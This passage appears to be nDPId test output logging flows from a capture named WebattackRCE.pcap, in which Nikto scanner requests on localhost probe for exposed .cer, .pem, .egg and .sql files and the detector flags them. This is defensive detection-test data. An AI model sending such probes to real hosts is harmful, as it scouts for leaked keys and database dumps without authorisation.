(Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 